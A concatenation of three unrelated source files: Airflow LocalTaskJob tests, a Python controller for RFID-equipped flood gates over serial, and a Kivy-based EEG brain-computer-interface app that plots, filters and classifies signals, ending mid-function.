session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
job1.heartbeat_callback(session=None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@patch('os.getpid')
def test_heartbeat_failed_fast(self, mock_getpid):
"""
Test that task heartbeat will sleep when it fails fast
"""
mock_getpid.return_value = 1
self.mock_base_job_sleep.side_effect = time.sleep
with create_session() as session:
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag_id = 'test_heartbeat_failed_fast'
task_id = 'test_heartbeat_failed_fast_op'
dag = dagbag.get_dag(dag_id)
task = dag.get_task(task_id)
dag.create_dagrun(run_id="test_heartbeat_failed_fast_run",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
job = LocalTaskJob(task_instance=ti, executor=MockExecutor(do_update=False))
job.heartrate = 2
heartbeat_records = []
job.heartbeat_callback = lambda session: heartbeat_records.append(job.latest_heartbeat)
job._execute()
self.assertGreater(len(heartbeat_records), 2)
for i in range(1, len(heartbeat_records)):
time1 = heartbeat_records[i - 1]
time2 = heartbeat_records[i]
self.assertGreaterEqual((time2 - time1).total_seconds(), job.heartrate)
@unittest.skipIf('mysql' in conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for _ in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run,
executor=SequentialExecutor())
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
def test_localtaskjob_maintain_heart_rate(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run,
executor=SequentialExecutor())
# this should make sure we only heartbeat once and exit at the second
# loop in _execute()
return_codes = [None, 0]
def multi_return_code():
return return_codes.pop(0)
time_start = time.time()
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_start:
with patch.object(StandardTaskRunner, 'return_code') as mock_ret_code:
mock_ret_code.side_effect = multi_return_code
job1.run()
self.assertEqual(mock_start.call_count, 1)
self.assertEqual(mock_ret_code.call_count, 2)
time_end = time.time()
self.assertEqual(self.mock_base_job_sleep.call_count, 1)
self.assertEqual(job1.state, State.SUCCESS)
# Consider we have patched sleep call, it should not be sleeping to
# keep up with the heart rate in other unpatched places
#
# We already make sure patched sleep call is only called once
self.assertLess(time_end - time_start, job1.heartrate)
session.close()
|
maze-2fg-rfid.py
|
#!/usr/bin/python
PWM_WARMUP_MS = 100
PWM_DC = 30
PWM_REFRESH_PERIOD = 2
import sys
from argparse import ArgumentParser
from threading import Thread, Lock
from serial import Serial
from time import sleep
import signal
import re, random
from time import time, strftime
class Tty(object):
s = None
def __init__(self, dev, baud=115200, timeout=5):
self.s = Serial(port=dev, baudrate=baud, timeout=timeout)
self.s.read_all()
def __del__(self):
if self.s:
self.s.close()
class Rfid(Tty):
def __init__(self, dev, baud=115200, timeout=5):
super(Rfid, self).__init__(dev, baud, timeout)
self.s.write(".ES0\r") # Disable auto shutdown
self.s.readline()
self.s.write(".RT05\r") # Set read timeout
self.s.readline()
self.s.write(".RB1\r") # Enable read beep
self.s.readline()
def read(self):
self.s.write(".r\r")
self.s.readline()
return self.s.readline().strip()
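# Illustrative usage sketch (added; hypothetical device path, not from the original source):
#     rfid = Rfid('/dev/ttyUSB1')
#     tag = rfid.read()   # returns the tag id string, or '' if the read times out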
class Gate(Tty):
def __init__(self, dev, baud=115200, timeout=5, ngpio=8, npwm=4):
super(Gate, self).__init__(dev, baud, timeout)
self.ngpio = ngpio
self.gpio_state = tuple([0 for i in range(ngpio)])
self.gpio_map = 0b00000000
self.pwm_state = [0 for i in range(npwm)]
self.pwm_map = 0b0000
self.s.write("\recho 0\r")
sleep(1)
self.s.read_all()
def pwm(self, i, duty_cycle, warmup_ms=100):
self.s.write("pwm %d %d %d\r" % (i, warmup_ms, duty_cycle))
self.pwm_state[i] = 1 if duty_cycle > 0 else 0
self.pwm_map = (self.pwm_map | 2**i) \
if duty_cycle > 0 \
else (self.pwm_map & ~2**i)
def rfid_charge(self, i=0):
d = 0 if i == 0 else 1
self.s.write("gpio 8 %d\r" % d)
def gpio_poll(self, block, binary=False):
if not block:
return self.gpio_state
while 1:
s = self.s.readline()
if s == "":
return self.gpio_map if binary else self.gpio_state
ss = s.split()
if ss[0] != "gpio:":
continue
x = int(ss[1], 0x10)
self.gpio_map = x % 0x100 # leave only 8 bits
ret = map(lambda i, x=x: 1 if x & (1 << i) else 0,
range(self.ngpio))
self.gpio_state = ret
return self.gpio_map if binary else self.gpio_state
class StateMachine(object):
def __init__(self, _gate, rfid=None):
self.gate = _gate
self.rfid = rfid
self.of = sys.stdout
self.pwm_lock = Lock()
self.pwm_state = [0,0,0,0]
self.pwm_refresh()
self.gpio_state = [0,0,0,0,0,0,0,0]
self.gpio_map = 0b00000000
self.close_threads = {} # empty dict for storing threads
self.close_kills = {}
self.gpio_kill = False
def start(self):
self.gate.rfid_charge(1)
self.gpio_thread = Thread(target=self.gpio_refresh)
self.gpio_thread.start()
def stop(self):
self.of.write('TURNING OFF\n')
self.of.flush()
self.gpio_kill = True
self.gpio_thread.join()
self.of.write('MAIN killed\n')
self.of.flush()
self.pwm_state = [0,0,0,0]
self.pwm_refresh()
self.of.write('All doors are opened!\n')
for i in [0,1]:
try:
                self.close_kills[i] = True
                self.close_threads[i].join()
self.of.write('Close %d killed\n' % (i))
self.of.flush()
except KeyError:
self.of.write('skip kill %d\n' % (i))
self.of.flush()
def pwm_refresh(self):
self.pwm_lock.acquire()
for i in range(len(self.pwm_state)):
self.gate.pwm(i, self.pwm_state[i]*PWM_DC, \
self.pwm_state[i]*PWM_WARMUP_MS)
self.pwm_lock.release()
def gpio_refresh(self):
while True:
if self.gpio_kill:
return
self.gpio_map = self.gate.gpio_poll(1, binary=True)
self.of.write( strftime("%Y-%m-%d %H:%M:%S ") + \
format(self.gpio_map, '08b') + ' | '+ format(self.gate.pwm_map, '04b')+'\n' )
self.of.flush()
# flood-gate control at FG-1
if (( 0b0001 & self.gate.pwm_map) == 0b0000 ) and \
( ( 0b00000111 & self.gpio_map ) == 0b00000100):
self.setCloseLock(0, 1, wtime=2)
if ( 0b00000011 & self.gpio_map ):
self.setCloseLock(0, 0)
if (( 0b0001 & self.gate.pwm_map) == 0b0001 ) and \
( ( 0b00001100 & self.gpio_map ) == 0b00000000):
self.setCloseLock(1, 1, wtime=4)
if ( 0b00001100 & self.gpio_map ):
self.setCloseLock(1, 0)
# flood-gate control at FG-2
if (( 0b0100 & self.gate.pwm_map) == 0b0000 ) and \
( ( 0b01110000 & self.gpio_map ) == 0b01000000):
self.setCloseLock(2, 1, wtime=2)
if ( 0b00110000 & self.gpio_map ):
self.setCloseLock(2, 0)
if (( 0b0100 & self.gate.pwm_map) == 0b0100 ) and \
( ( 0b11000000 & self.gpio_map ) == 0b00000000):
self.setCloseLock(3, 1, wtime=4)
if ( 0b11000000 & self.gpio_map ):
self.setCloseLock(3, 0)
def setCloseLock(self, nlock, state, wtime=4):
self.of.write('Lock %d => %d\n' % (nlock, state))
self.of.flush()
if state:
try:
__a = self.close_threads[nlock]
# thread was already started
except KeyError:
self.close_kills[nlock] = 0
self.close_threads[nlock] = Thread(target=self.closeBody, args=(nlock, wtime) )
self.close_threads[nlock].start()
else:
try:
__a = self.close_threads[nlock]
self.close_kills[nlock] = 1
self.close_threads[nlock].join()
del(self.close_threads[nlock])
except KeyError:
pass
def closeBody(self, nlock, wtime):
uid = random.randint(0,1e8)
self.of.write('CLOSE-%d <%d> STARTED\n' % (nlock, uid) )
self.of.flush()
wtime = float(wtime)
NTICKS = 100
for i in range(NTICKS):
sleep(wtime/NTICKS)
if self.close_kills[nlock]:
self.of.write('CLOSE-%d <%d> STOPPED\n' % (nlock, uid))
self.of.flush()
return
self.of.write('CLOSE-%d <%d> CLOSING\n' % (nlock, uid) )
self.of.flush()
self.pwm_lock.acquire()
# FG-1 behaviors
if (nlock == 0):
if (self.rfid is None):
self.of.write(' RFID reading SKIPPED \n')
else:
self.gate.rfid_charge(0)
self.rfid_read()
self.gate.rfid_charge(1)
self.gate.pwm(0, PWM_DC, PWM_WARMUP_MS)
self.gate.pwm(1, 0, 0)
self.of.write(' =======000000000000================ \n')
self.of.flush()
self.pwm_lock.release()
elif (nlock == 1):
self.gate.pwm(0, 0, 0)
self.gate.pwm(1, PWM_DC, PWM_WARMUP_MS)
self.of.write(' =======111111111111================ \n')
self.of.flush()
self.pwm_lock.release()
# FG-2 behaviors
elif (nlock == 2):
self.gate.pwm(2, PWM_DC, PWM_WARMUP_MS)
self.gate.pwm(3, 0, 0)
self.of.write(' =======222222222222================ \n')
self.of.flush()
self.pwm_lock.release()
elif (nlock == 3):
self.gate.pwm(2, 0, 0)
self.gate.pwm(3, PWM_DC, PWM_WARMUP_MS)
self.of.write(' =======333333333333================ \n')
self.of.flush()
self.pwm_lock.release()
self.of.write('CLOSE-%d <%d> CLOSED\n' % (nlock, uid))
self.of.flush()
def rfid_read(self):
self.rfid_id = ""
MAX_READ_TRIES=3
rt = 0
while (rt < MAX_READ_TRIES) and len(self.rfid_id) < 5:
print "RFID: start read"
self.rfid_id = self.rfid.read().strip()
rt += 1
self.of.write("RFID: id=%s \n" % self.rfid_id)
class ServiceExit(Exception):
"""
Custom exception which is used to trigger the clean exit
of all running threads and the main program.
"""
pass
def service_shutdown(signum, frame):
print('Caught signal %d' % signum)
raise ServiceExit
if __name__ == "__main__":
signal.signal(signal.SIGTERM, service_shutdown)
signal.signal(signal.SIGINT, service_shutdown)
p = ArgumentParser(description="maze control")
p.add_argument('-g', dest="gate", metavar='/dev/ttyX',
type=str, help='gate interface', required=1)
p.add_argument('-r', dest="rfid", metavar='/dev/ttyY',
type=str, help='RFID interface', required=0)
p.add_argument('-l', dest="log", metavar='FILE',
type=str, help='log file', default='maze.log')
a = p.parse_args()
g = Gate(a.gate)
r = Rfid(a.rfid) if a.rfid else None
m = StateMachine(g, rfid=r)
try:
m.start()
while True:
sleep(0.5)
except ServiceExit:
m.stop()
print 'exiting main'
'''
try:
while True:
print '1'
sleep(5)
except KeyboardInterrupt:
print '..stoppping..'
m.stop()
print '..stopped!'
'''
|
main.py
|
from __future__ import print_function,unicode_literals,with_statement,division
# kivy related
import matplotlib
import threading
matplotlib.use('module://kivy.garden.matplotlib.backend_kivy')
from matplotlib import pyplot as plt
from kivy.garden.graph import MeshLinePlot
#import matplotlib.animation as animation
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.popup import Popup
from kivy.clock import Clock
from kivy.properties import StringProperty,ListProperty
from kivy.uix.screenmanager import ScreenManager, Screen
import socket
import struct
import numpy as np
import pandas as pd
from scipy import signal
from functools import partial
from colorama import Fore, Back, Style, init
import logging
import time
# Kivy Material Design
from kivymd.theming import ThemeManager
from BCIEncode import sequence
__author__ = 'Guoli Lv'
__email__ = 'guoli-lv@hotmail.com'
class CountDown(BoxLayout):
pass
class SerialPortSelection(BoxLayout):
""" Select Serial Port on GUI """
unlimited = True
save_directory = 'data'
def __init__(self,**kwargs):
super(SerialPortSelection,self).__init__(**kwargs)
        # The kv file is loaded after rendering, so in __init__ widgets cannot be accessed by id because nothing has been rendered yet. Clock.schedule_once(..., 0) defers the call to a function that relies on ids until after rendering.
Clock.schedule_once(self.scanPorts,0)
Clock.schedule_once(self.popupHintOnConnectionFailedConfig,0)
def popupHintOnConnectionFailedConfig(self,dt=0):
# Connection Failed popup hint configuration
self.popup = Popup(title='Connection Failed',id='popup')
App.get_running_app().root.current_screen.add_widget(self.popup)
App.get_running_app().root.current_screen.remove_widget(self.popup)
def clear_filename(self):
self.ids['filename'].text = ''
def changeState(self,state):
if state == 'down':
con = App.get_running_app().connect(self.ids['uart'].text)
if self.ids['duration'].text != 'Unlimited':
self.unlimited = False
self.countDown = CountDown()
self.parent.add_widget(self.countDown)
self.duration = int(self.ids['duration'].text[:-1])
self.remained = int(self.ids['duration'].text[:-1])
self.countDown.ids['remaingTime'].text = self.ids['duration'].text
self.countDown.ids['progress'].value = 0
App.get_running_app().save = True
Clock.schedule_interval(self.tick,1/10)
# When connection failed
if con is False:
self.ids['connect'].state = 'normal'
# Popup hint and rescan serial devices
self.popup.open()
Clock.schedule_once(self.popup.dismiss ,1)
self.scanPorts()
else:
data = App.get_running_app().disconnect()
if not self.unlimited:
Clock.unschedule(self.tick)
self.parent.remove_widget(self.countDown)
App.get_running_app().save = False
filename = self.ids['filename'].text
if len(filename) == 0:
filename = time.strftime("%Y-%m-%d_%H-%M-%S", time.localtime())
np.savetxt('./%s/BCI-%s.txt'%(self.save_directory, filename),App.get_running_app().toSave)
App.get_running_app().toSave = list()
def tick(self,dt):
self.remained -= dt
self.countDown.ids['remaingTime'].text = '%d s' % self.remained
self.countDown.ids['progress'].value = (1 - self.remained/self.duration) * 100
if self.remained <= 0:
self.ids['connect'].state = 'normal'
def scanPorts(self,dt=0):
pass
class FFT(BoxLayout):
""" Real Time frequency-domain Plotting """
length = 128 # FFT length
fftLen = 1024
    plotScale = 4 # (integer) After the FFT there are as many as fftLen/2 points to plot, so it is worth reducing them.
autoScale = True
def __init__(self,**kwargs):
super(FFT,self).__init__(**kwargs)
self.fs = App.get_running_app().fs
self.ts = 1.0/self.fs # Sampling interval
self.xscale = self.fs/4
self.xcenter = self.fs/2
# Configure real time fft figure with matplotlib
self.fig, self.ax = plt.subplots()
        #plt.ion() # Never turn this on, or the application becomes almost frozen.
# Settings
self.ax.xaxis.set_label_coords(0.9, -0.01)
self.ax.yaxis.set_label_coords(-0.00, 1.05)
self.ax.set_xlabel('Freq(Hz)')
self.ax.set_ylabel('Amplitude(uV)',rotation=0)
# self.ax.set_title('PSD')
self.ax.set_title('FFT')
# x-axis, ts = 1/fs
self.f = np.fft.rfftfreq(self.fftLen,self.ts)
fPos = self.f#[self.f>=0]
fPlot = [fPos[i] for i in range(len(fPos)) if np.mod(i,self.plotScale) == 0 ]
self.plotLen = len(fPlot)
# Set X padding
padding = (np.max(fPlot) - np.min(fPlot)) * 0.01
self.ax.set_xlim([np.min(fPlot)-padding,np.max(fPlot)+padding])
self.FFTplot, = self.ax.plot(fPlot,np.zeros_like(fPlot))
# self.fig.canvas.mpl_connect('scroll_event', self.figure_scroll)
self.add_widget(self.fig.canvas)
# def start(self):
# Clock.unschedule(self.refresh)
# Clock.schedule_interval(self.refresh,1/self.fps)
#
# def stop(self):
# Clock.unschedule(self.refresh)
# self.FFTplot.set_ydata(np.zeros(self.fftLen))
# self.ax.set_ylim([-1,1])
# plt.draw()
def figure_scroll(self,event):
print('scroll event from mpl ', event.x, event.y, event.step, event.button)
def clear(self, dt=0):
y = self.FFTplot.get_ydata()
self.FFTplot.set_ydata(np.zeros(len(y)))
self.ax.set_ylim([0,1])
plt.draw_all()
def set_fft_length(self, FixedFFTLen=False):
self.length = int(self.ids['fftLen'].text)
if not FixedFFTLen:
self.fftLen = self.length
self.f = np.fft.rfftfreq(self.fftLen,self.ts)
# fPos = self.f[self.f>=0]
# fPlot = [fPos[i] for i in range(len(fPos)) if np.mod(i,self.plotScale) == 0 ]
fPos = self.f
fPlot = [fPos[i] for i in range(len(fPos)) if np.mod(i,self.plotScale) == 0 ]
self.plotLen = len(fPlot)
self.FFTplot.set_data(fPlot,np.zeros_like(fPlot))
def set_scale(self):
self.scale = self.ids['scale'].text
if self.ids['scale'].text == 'Auto':
self.autoScale = True
else:
self.autoScale = False
if self.scale == '10μV':
self.ax.set_ylim([0,10])
elif self.scale == '100μV':
self.ax.set_ylim([0,100])
elif self.scale == '1mV':
self.ax.set_ylim([0,1000])
elif self.scale == '10mV':
self.ax.set_ylim([0,10000])
elif self.scale == '100mV':
self.ax.set_ylim([0,1e5])
elif self.scale == '1000mV':
self.ax.set_ylim([0,1e6])
def set_horizontal_width(self):
self.xcenter = self.ids['horizon'].value
self.ax.set_xlim([self.xcenter - self.xscale , self.xcenter + self.xscale])
def set_xscale(self):
self.xscale = self.fs/4 / self.ids['xscale'].value
xmin = self.xscale
xmax = self.fs/2 - self.xscale
self.ids['horizon'].range = (xmin,xmax)
if self.xcenter - self.xscale < 0:
self.ids['horizon'].value = xmin
elif self.xcenter + self.xscale > self.fs/2:
self.ids['horizon'].value = xmax
self.ax.set_xlim([self.xcenter - self.xscale , self.xcenter + self.xscale])
def refresh(self):
data = App.get_running_app().filteredData
if len(data) < self.length:
return False
# logging.info("Refreshing. Length of data:%d"%(len(data)))
# Clear
#self.ax.cla()
# Get data
y = data[-self.length:] # * signal.blackman(self.length, sym=0)
# PSD
# x,YPlot = signal.periodogram(y,fs=self.fs,nfft=None,window='hamming')
# YPlot = 10 * np.log(YPlot)
# x = x[1:]
# YPlot = YPlot[1:]
# self.FFTplot.set_data(x,YPlot)
# FFT
Y = np.fft.rfft(y,self.fftLen)
YampPos = np.abs(Y/self.fs)
# YampPos[1:-1] = YampPos[1:-1] * 2
YPlot = [YampPos[i] for i in range(len(YampPos)) if np.mod(i,self.plotScale)==0 ]
# YPlot = YampPos
self.FFTplot.set_ydata(YPlot)
if self.autoScale:
# Set y padding
padding = (np.max(YPlot) - np.min(YPlot)) * 0.1
# TODO To improve figure ylimits stability
if padding > 0.1:
self.ax.set_ylim([np.min(YPlot)-padding,np.max(YPlot)+padding])
plt.draw_all()
#self.ax.plot(fPlot,YPlot)
class RealTimePlotting(BoxLayout):
scale = 'Auto'
plotScale = 2
# band = np.array([49,51])
"""Real Time time-domain Plotting """
def __init__(self,**kwargs):
super(RealTimePlotting ,self).__init__(**kwargs)
self.fs = App.get_running_app().fs
self.length = self.fs * 4
# Configure real time fft figure with matplotlib
self.fig, self.ax = plt.subplots()
        #plt.ion() # Never turn this on, or enjoy an almost frozen application.
# Settings
self.ax.set_xlabel('Time(seconds)')
self.ax.xaxis.set_label_coords(0.8, -0.01)
self.ax.yaxis.set_label_coords(-0.00, 1.05)
self.ax.set_ylabel('Amplitude(uV)',rotation=0)
self.ax.get_xaxis().set_visible(True)
#self.ax.set_title('Real Time Plotting')
# Plot x data once. Then we only need to update y data
x = np.arange(0,self.length)/self.fs
x= [x[i] for i in range(len(x)) if np.mod(i,self.plotScale)==0 ]
self.ax.set_xlim([np.min(x),np.max(x)])
self.RealTimePlot, = self.ax.plot([],[])
self.RealTimePlot.set_xdata(x)
self.RealTimePlot.set_ydata(np.zeros_like(x).tolist())
self.add_widget(self.fig.canvas)
# def start(self):
# Clock.unschedule(self.refresh)
# Clock.schedule_interval(self.refresh,1/self.fps)
# def stop(self):
# Clock.unschedule(self.refresh)
# self.RealTimePlot.set_ydata(np.zeros(self.length))
# self.ax.set_ylim([-1,1])
# plt.draw()
def clear(self,dt=0):
self.RealTimePlot.set_ydata(np.zeros(int(self.length/self.plotScale)).tolist())
self.ax.set_ylim([-1,1])
plt.draw_all()
def refresh(self):
        # TODO Real-time plotting and FFT cannot currently be shown at the same time
# y_raw = App.get_running_app().data[-self.length:]
y_raw = App.get_running_app().filteredData[-self.length:]
y= [y_raw[i] for i in range(len(y_raw)) if np.mod(i,self.plotScale)==0 ]
# Frequency Domain filter
# b,a = signal.butter(4,[5 /(self.fs/2),45 /(self.fs/2)],'band')
# y = signal.filtfilt(b,a,y_raw)
self.RealTimePlot.set_ydata(y)
if self.scale == 'Auto':
ymin,ymax = self.ax.get_ylim()
if ymax - ymin !=0:
padding = ( np.max(y) - np.min(y) )*0.1
if np.min(y) < ymin or np.max(y) > ymax or padding < (ymax - ymin) *0.1 and (ymax-ymin)>10:
padding = (np.max(y) - np.min(y)) * 0.1
# TODO To improve figure ylimits stability
self.ax.set_ylim([np.min(y)-padding, np.max(y)+padding])
plt.draw_all()
def set_filter(self):
if self.ids['filters'].text == 'None':
App.get_running_app().refresh_filter(0,0,'None')
elif self.ids['filters'].text == 'Highpass:4Hz':
fs = App.get_running_app().fs
App.get_running_app().refresh_filter(4,fs/2,ftype='highpass')
elif self.ids['filters'].text == '4Hz-60Hz':
App.get_running_app().refresh_filter(4,60)
elif self.ids['filters'].text == '4Hz-45Hz':
App.get_running_app().refresh_filter(4,45)
def set_notch(self):
if self.ids['notch'].text == 'None':
App.get_running_app().refresh_notch_filter(50,False)
elif self.ids['notch'].text == '50Hz':
App.get_running_app().refresh_notch_filter(50,True)
elif self.ids['notch'].text == '60Hz':
App.get_running_app().refresh_notch_filter(60,True)
def set_length(self):
if self.ids['length'].text == '0.5s':
self.length = int(self.fs * 0.5)
elif self.ids['length'].text == '1s':
self.length = self.fs * 1
elif self.ids['length'].text == '2s':
self.length = self.fs * 2
elif self.ids['length'].text == '3s':
self.length = self.fs * 3
elif self.ids['length'].text == '4s':
self.length = self.fs * 4
x_raw = np.arange(0,self.length)/self.fs
x= [x_raw[i] for i in range(len(x_raw)) if np.mod(i,self.plotScale)==0 ]
y_raw = App.get_running_app().data[-self.length:]
y= [y_raw[i] for i in range(len(y_raw)) if np.mod(i,self.plotScale)==0 ]
self.ax.set_xlim([np.min(x),np.max(x)])
self.RealTimePlot.set_data(x,y)
plt.draw_all()
class Test(Screen):
"""Test Layout"""
# Settings
theme_cls = ThemeManager()
def __init__(self, **kwargs):
""" Initializing serial and plot
"""
super(Test,self).__init__(**kwargs)
''' BLINKING
'''
# for i in range(12):
# Clock.schedule_interval(partial(self.blinking,i),1/(0+12))
def blinking(self,idx,dt):
widgetID = 'button%d' % idx
if self.ids[widgetID].state == 'normal':
self.ids[widgetID].state = 'down'
self.ids[widgetID].trigger_action(0.01)
if self.ids[widgetID].state == 'down':
self.ids[widgetID].state = 'normal'
self.ids[widgetID].trigger_action(0.01)
class Blink(Screen):
# Settings
theme_cls = ThemeManager()
def __init__(self, **kwargs):
""" Initializing serial and plot
:returns: TODO
"""
super(Blink,self).__init__(**kwargs)
# ''' BLINKING
# '''
# for i in range(12):
# hz = 6 # i + 4
# Clock.schedule_interval(partial(self.blinking,i),1/(2*hz))
# def blinking(self,idx,dt):
# widgetID = 'button%d' % idx
# if self.ids[widgetID].state == 'normal':
# self.ids[widgetID].state = 'down'
# elif self.ids[widgetID].state == 'down':
# self.ids[widgetID].state = 'normal'
def set_freq(self):
"""
set screen blinking frequency
"""
freq = self.ids['freq'].value
self.ids['freqLabel'].text = "%dHz" % self.ids['freq'].value
for i in range(12):
Clock.unschedule(partial(self.blinking,i))
Clock.schedule_interval(partial(self.blinking,i),1/(freq*2))
def toggleBlink(self):
pass
class BlinkApp(App):
kv_directory = 'ui_template'
def __init__(self,**kwargs):
""" Initializing serial
:returns: TODO
"""
super(BlinkApp,self).__init__(**kwargs)
def build(self):
root = ScreenManager()
root.add_widget(Blink(name='bci'))
return root
class BCIApp(App):
# Settings
kv_directory = 'ui_template'
fps = 5
fs = 500
storedLen = 4096
data = list()
# Buffer
    rawRemained = b'' # Raw bytes from serial; holds whatever was left unparsed in the previous read
save = False
toSave = list()
filteredDataNotch = list()
filteredData = list()
port = 23333
# Classification
lastF = {'f':False, 'count':0}
fBuffer = dict()
laststate = 0
ratio = 0.4
window = fs
tolerance = 0.5
interval = 0.2
decodeBuffer = [False, False, False]
def __init__(self,**kwargs):
""" Initializing serial
:returns: TODO
"""
init(autoreset=True)
self.data = np.zeros(self.storedLen).tolist()
self.filteredData = np.zeros(self.storedLen).tolist()
self.filteredDataNotch = np.zeros(self.storedLen).tolist()
self.refresh_notch_filter(50,True)
self.refresh_filter(4,45)
# self.b,self.a = signal.butter(4,[4 /(self.fs/2),30 /(self.fs/2)],'band')
super(BCIApp,self).__init__(**kwargs)
self.tcpSerSock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.tcpSerSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # Bind the server port
self.tcpSerSock.bind(("", self.port))
        # Start listening
self.tcpSerSock.listen(5)
self.tcp = False
def on_stop(self):
if self.tcp:
self.disconnect()
def build(self):
root = ScreenManager()
root.add_widget(Test(name='bci'))
return root
def classify(self, dt):
def classifyNaive():
"""
Naive Classification
"""
with open('blinkState','r') as f:
state = int(f.read())
if state:
y = self.filteredData[-self.window:]
Y = np.fft.rfft(y)
fs = App.get_running_app().fs
freq = np.fft.rfftfreq(len(y),1/fs)
powerSpectrum = np.abs(Y/fs)
data = pd.Series(powerSpectrum,index=freq)
# Sum PS on each Frequency
naive= dict()
for i in range(1, int(data.index.max())):
naive[i] = data[i-self.tolerance : i+self.tolerance].mean()
naive = pd.Series(naive)
                maximum = naive.max()
noise = (naive.sum() - naive.max()) / (len(naive) - 1)
snr = naive.max()/noise
argmax = naive.argmax()
if argmax in [6,11,12,13]:
fmax = 12
elif argmax in [8,15,16,17]:
fmax = 8
elif argmax in [9,10,19,20,21,22]:
fmax = 10
else:
fmax = False
if fmax:
try:
self.fBuffer[fmax] += 1
except KeyError:
self.fBuffer[fmax] = 1
print("Max:%dHz %f SNR:%.3f F: %s%d%sHz"%(argmax, maximum, snr, Fore.GREEN, fmax, Fore.RESET))
else:
try:
self.fBuffer['invalid'] += 1
except KeyError:
self.fBuffer['invalid'] = 1
print("Max:%dHz %f SNR:%.3f F: %sInvaid%sHz"%(argmax, maximum, snr, Fore.RED, Fore.RESET))
# If state changed, stimuli freq should be determined and fList be dumped
if self.laststate != state and len(self.fBuffer) > 0 and self.laststate:
f,count = max(self.fBuffer.items(), key=lambda x: x[1])
# print(self.fBuffer)
total = sum(self.fBuffer.values())
if f == 'invalid':
print('%sNot certain%s' % (Fore.RED, Fore.RESET))
self.decodeBuffer[self.laststate-1] = False
elif count >= total * self.ratio:
print('%sStaring at %s%dHz%s' % (Fore.GREEN, Fore.YELLOW, f, Fore.RESET))
self.decodeBuffer[self.laststate-1] = f
else:
print('%sNot certain%s' % (Fore.RED, Fore.RESET))
self.decodeBuffer[self.laststate-1] = False
self.fBuffer = dict()
if self.laststate == 3:
print(self.decodeBuffer)
num = self.decode()
self.laststate = state
t = threading.Thread(target=classifyNaive)
t.start()
def decode(self):
if False in self.decodeBuffer:
return False
else:
for i in sequence:
if (sequence[i] == self.decodeBuffer).all():
print("%sSuccessfully selected %d%s"%( Fore.GREEN, i, Fore.RESET) )
with open('code','w') as f:
f.write(str(i))
f.flush()
f.close()
return i
def filt_notch(self,new):
self.xbufNotch += [new]
y = sum(self.bNotch * self.xbufNotch[::-1]) - sum(self.aNotch[1:] * self.ybufNotch[::-1])
self.xbufNotch= self.xbufNotch[1:]
self.ybufNotch += [y]
self.ybufNotch = self.ybufNotch[1:]
return y
def filt(self,new):
self.xbuf += [new]
